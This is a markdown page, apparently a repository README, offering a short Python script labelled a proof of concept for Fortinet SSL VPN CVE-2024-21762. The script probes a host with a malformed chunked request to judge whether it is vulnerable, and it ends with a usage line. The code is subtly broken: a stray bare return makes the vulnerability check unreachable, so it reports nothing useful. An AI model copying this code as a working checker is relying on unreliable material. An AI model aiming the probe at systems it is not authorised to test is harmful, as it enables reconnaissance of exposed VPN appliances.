70 lines
1.5 KiB
Markdown
70 lines
1.5 KiB
Markdown
## Fortinet-SSL-VPN-CVE-2024-21762
|
|
|
|
|
|
|
|
## poc
|
|
```python
|
|
import socket
|
|
import ssl
|
|
import sys
|
|
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
|
|
context.check_hostname=False
|
|
context.verify_mode=ssl.CERT_NONE
|
|
|
|
# should be fine for most hosts, increase this if you're getting errors.
|
|
TIMEOUT=5
|
|
|
|
def send_req(host, req):
|
|
try:
|
|
s=socket.create_connection(host, timeout=5)
|
|
except: return -1
|
|
ss=context.wrap_socket(s)
|
|
ss.send(req)
|
|
try:
|
|
return ss.read(2048)
|
|
except socket.timeout:
|
|
return 0
|
|
|
|
control_req="""POST /remote/VULNCHECK HTTP/1.1\r
|
|
Host: {}\r
|
|
Transfer-Encoding: chunked\r
|
|
\r
|
|
0\r
|
|
\r
|
|
\r
|
|
"""
|
|
|
|
check_req="""POST /remote/VULNCHECK HTTP/1.1\r
|
|
Host: {}\r
|
|
Transfer-Encoding: chunked\r
|
|
\r
|
|
0000000000000000FF\r
|
|
\r
|
|
"""
|
|
def check(host):
|
|
baseurl="https://{}:{}".format(*host)
|
|
r1=send_req(host, control_req.format(baseurl).encode())
|
|
if r1==-1:
|
|
return "Connection Failed"
|
|
if r1==0:
|
|
return "Control request failed"
|
|
return
|
|
if b"HTTP/1.1 403 Forbidden" not in r1:
|
|
print("[warning] Server does not look like a Fortinet SSL VPN interface")
|
|
r2=send_req(host, check_req.format(baseurl).encode())
|
|
if r2==0: return "Vulnerable"
|
|
else: return "Patched"
|
|
|
|
if __name__=="__main__":
|
|
try:
|
|
host=sys.argv[1]
|
|
port=int(sys.argv[2])
|
|
except:
|
|
print("Usage: check-cve-2024-21762.py <host> <port>")
|
|
exit()
|
|
HOST=(host,port)
|
|
print(check(HOST))
|
|
```
|
|
|
|
```python3 check-cve-2024-21762.py <host> <port>```
|